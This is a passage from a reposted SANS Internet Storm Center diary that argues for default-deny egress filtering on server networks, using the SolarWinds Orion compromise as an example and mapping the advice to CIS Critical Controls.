  • If you have administrators who RDP to servers and then use the browser on that server for support purposes, this will no longer work for them.  THIS IS A GOOD THING.  Browse to potentially untrusted sites from your workstation, not from the servers in the server VLAN!
  • As you add or remove software, there’s some firewall rule maintenance involved.  If you skip that step, then things will break when you implement them on the servers.  This “tie the firewall to the server functions” step is something we all should have been doing all along.
  • But I have servers in the cloud, you say?  It’s even easier to control outbound access in any of the major clouds, either with native tools or by implementing your own cloud-based or virtual firewall.  If you haven’t been focused on firewall functions for your cloud instances, you should drop your existing projects and focus on that for a week or so (seriously, not joking).
  • On the plus side, you’ll have started down the path of implementing the Critical Controls.  Take a closer look at them if you haven’t already, there’s only good things to find there 🙂
  • Also on the plus side, you’ll know which IPs, subnets and domains your purchased applications reach out to
  • Just as important, or even moreso – you’ll have that same information for your in-house applications.
  • Lastly, if any of your hosts or applications reach out to a new IP, it’s going to be blocked and will raise an alert.  If it ends up being reverse-shell or C&C traffic, you can definitively say that you blocked that traffic.  (score!)
  • Lastly-lastly: treat denied server packets as security incidents.  Make 100% sure that denying a packet breaks something before allowing it.  If you just add an “allow” rule for every denied packet, then at some point you’ll just be enabling malware to do its best.

For most organizations with fewer than a hundred server VMs, you can turn this into an “hour or two per day” project and get it done in a month or so.

Will this catch everything?  No, you still need to address workstation egress, but that’s a do-able thing too (https://isc.sans.edu/forums/diary/Egress+Filtering+What+do+we+have+a+bird+problem/18379/).  Would this have caught the Solarwinds Orion code in your environment?  Yes, parts of it: in most shops the Orion server does not need internet access at all (if you don’t depend on the application’s auto-update process), and even then it’s a short “allow” list.  And if the reaction is to treat denied packets seriously, you’d have caught it well before it hit the news (this was a **lengthy** incident).  The fact that nobody caught it in all that time really means that we’re still treating outbound traffic with some dangerous mindsets: “we trust our users” (to not make mistakes), “we trust our applications” (to not have malware) and “we trust our server admins” (to not do dumb stuff like browse from a server, or check their email while on a server).  If you read these with the text in the brackets, I’m hoping you’ll see that these are mindsets we should set aside; maybe we should have done that back in the early 2000s!  This may seem like an over-simplification, but it really isn’t: this approach really does work.

If you’ve caught anything good with a basic egress filter, please share using our comment form (NDA permitting of course).

Referenced Critical Controls:

CC1: Inventory and Control of Hardware Assets (all of it, if you haven’t done this start with your server VLAN)
CC2: Inventory and Control of Software Assets (again, all of it, and again, start with your server VLAN for this)
CC7.6 Log all URL requests from each of the organization’s systems, whether on-site or a mobile device, in order to identify potentially malicious activity and assist incident handlers with identifying potentially compromised systems.
CC9.1 Associate active ports, services, and protocols to the hardware assets in the asset inventory.
CC9.4 Apply host-based firewalls or port-filtering tools on end systems, with a default-deny rule that drops all traffic except those services and ports that are explicitly allowed.
CC12.4 Deny communication over unauthorized TCP or UDP ports or application traffic to ensure that only authorized protocols are allowed to cross the network boundary in or out of the network at each of the organization’s network boundaries.
CC12.5 Configure monitoring systems to record network packets passing through the boundary at each of the organization’s network boundaries.

 

===============
Rob VandenBrink
[email protected]

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.
